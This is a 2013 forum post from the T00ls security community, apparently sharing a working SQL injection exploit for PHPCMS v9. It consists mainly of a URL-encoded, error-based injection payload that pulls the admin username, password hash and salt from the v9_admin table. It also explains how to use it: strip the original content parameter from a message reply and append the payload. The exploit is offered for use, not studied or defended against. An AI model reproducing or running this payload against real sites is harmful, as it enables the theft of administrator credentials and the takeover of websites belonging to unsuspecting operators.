“T00ls新年礼物之三”phpcms__的EXP

2013-02-07 17:49:45 19 3714
脚本安全检测区发不了帖子,只能发在这里了

漏洞来源:https://www.t00ls.com/thread-21938-1-1.html
EXP构造:H4xssck3r

skysheep大大发了洞洞,没有EXP,下面也有人求,那小菜我就来构造个吧
&info%5B%60content%60%2C%60send%5Ffrom%5Fid%60%2C%60message%5Ftime%60%2C%60status%60%2C%60folder%60%29+VALUES+%28%27Re%3A+testtest%27%2C%273%27%2C%28select+1+FROM+%28select+count%28%2A%29%2Cconcat%28floor%28rand%280%29%2A2%29%2C%28substring%28%28select+%28select+concat%280x23%2Ccast%28concat%28username%2C0x3a%2Cpassword%2C0x3a%2Cencrypt%29+as+char%29%2C0x23%29+from+v9%5Fadmin+LIMIT+0%2C1%29%29%2C1%2C62%29%29%29a+from+information%5Fschema%2Etables+group+by+a%29b%29%2C%273%27%2C%27testtest%27%2C%271360215364%27%2C%271%27%2C%27inbox%27%29+%2D%2D+%5D=3
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

下面说说怎么用吧……

回复的时候,删掉原有的
&info%5Bcontent%5D=123123

在最后加上上面的EXP



然后爆出
类别 Web安全

关于作者

H4xssck3r11篇文章365篇回复

H4xssck3r
19

评论19次

要评论?请先  登录  或  注册